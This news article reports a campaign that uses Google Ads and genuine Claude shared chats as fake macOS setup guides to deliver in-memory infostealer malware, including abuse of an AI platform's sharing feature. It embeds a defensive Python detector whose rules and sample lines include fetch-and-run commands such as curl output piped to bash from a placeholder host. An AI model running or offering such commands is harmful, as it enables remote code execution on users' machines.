Hackers Abuse Google Ads and Claude Shared Chats to Spread macOS Malware

Real Claude shared chats used to spread macOS malware



Attackers are abusing legitimate Anthropic Claude shared chats and Google Ads to trick Mac users into installing malware through fake setup guides.

The campaign targets people searching for “Claude mac download.” Sponsored results appear to show real claude.ai links, but they lead victims to shared Claude chats that pose as installation instructions.

Real Claude pages make the attack harder to spot

The dangerous part is that attackers are not relying on fake Claude domains. Instead, they use Claude’s own shared chat feature to host malicious instructions that look like legitimate setup guides.

Some pages claim to explain how to install “Claude Code on Mac,” while others appear to borrow trust signals from names like Apple Support. Once users open the guide, they are told to launch Terminal and paste commands.

Those commands quietly download and run malware, often without leaving obvious files behind.

Malware runs in memory and steals Mac data

Researchers found that the payloads use compressed shell scripts and execute mainly in memory. This helps the malware avoid basic detection because users may not see a suspicious app or installer on disk.

The malware can collect the victim’s IP address, hostname, locale, and keyboard settings. Some variants also appear to avoid Russian and CIS-region systems.

Once active, the malware can run commands through osascript, steal browser passwords, grab cookies, access macOS Keychain data, and send stolen information to attacker-controlled servers. One variant has been linked to the MacSync infostealer.
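For defenders, the delivery pattern described above (a pasted Terminal command that fetches or unpacks a script and runs it without writing it to disk, plus osascript execution) can be checked in pasted text or shell history. The sketch below is an added example, not code from the researchers or from Anthropic; the rule names, patterns and sample lines are assumptions constructed for illustration.

```python
import re

# Heuristics for commands a "setup guide" tells a Mac user to paste into Terminal.
# Rule names and patterns are assumptions of this example. Legitimate installers
# use the same shapes, so a hit means "check the source", not "confirmed malware".
INTERP = r"(?:sudo\s+)?(?:/\S*/)?(?:(?:ba|z|da|k)?sh|python3?|osascript)\b"
RULES = {
    # curl/wget output piped straight into an interpreter: nothing lands on disk
    "download_piped_to_interpreter": re.compile(
        rf"\b(?:curl|wget)\b[^;]*\|\s*{INTERP}"),
    # encoded or compressed script unpacked and piped into a shell
    "decode_or_decompress_piped_to_shell": re.compile(
        rf"\b(?:base64\s+(?:-d|-D|--decode)|gunzip|gzip\s+-d|zcat)\b[^;]*\|\s*{INTERP}"),
    # sh -c "$(curl ...)" or eval "$(curl ...)"
    "shell_runs_downloaded_text": re.compile(
        r"""\b(?:(?:ba|z|da|k)?sh\s+-c|eval)\s+["']?\$\(\s*(?:curl|wget)\b"""),
    # inline AppleScript, the osascript execution path mentioned above
    "osascript_inline": re.compile(r"\bosascript\s+-e\b"),
}
ZSH_HISTORY_PREFIX = re.compile(r"^: \d+:\d+;")  # zsh extended-history timestamp


def flag_command(cmd: str) -> list[str]:
    """Return the sorted names of every rule the command line matches."""
    return sorted(name for name, rx in RULES.items() if rx.search(cmd))


def scan(lines) -> list[tuple[int, list[str], str]]:
    """Check each line (pasted text or shell history); return the flagged ones."""
    findings = []
    for number, raw in enumerate(lines, 1):
        cmd = ZSH_HISTORY_PREFIX.sub("", raw.strip())
        hits = flag_command(cmd)
        if hits:
            findings.append((number, hits, cmd))
    return findings


# Constructed sample input; example.invalid is a reserved, non-resolving name.
SAMPLE = [
    "brew install node",
    ": 1700000000:0;curl -fsSL https://example.invalid/setup.sh | bash",
    "echo 'QUJD' | base64 -d | gunzip | sh",
    '/bin/zsh -c "$(curl -fsSL https://example.invalid/i)"',
    "osascript -e 'display dialog \"hello\"'",
]

if __name__ == "__main__":
    for number, hits, cmd in scan(SAMPLE):
        print(f"line {number}: {', '.join(hits)}: {cmd}")
```

Because the script never touches disk, the command line itself (from shell history or endpoint process telemetry) is the most reliable place to apply checks like these.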

Sponsored software downloads remain risky

The campaign shows why users should avoid sponsored results when downloading apps, especially developer tools or AI clients. A real domain in a Google ad does not always mean the instructions are safe.

Users should download Claude only through official Anthropic pages and documentation. Mac users should also avoid pasting Terminal commands from shared chats, search ads, forums, or unknown setup guides.

This is not the first time attackers have used trusted AI platforms or search ads to spread malware. Hackers previously abused Bing AI to distribute malicious links, and fake Claude AI downloads were also used in recent malware campaigns. A fake OpenAI Privacy Filter repository on Hugging Face also recently reached the top trending spot before researchers exposed it as an infostealer campaign.

Via Bleeping Computer
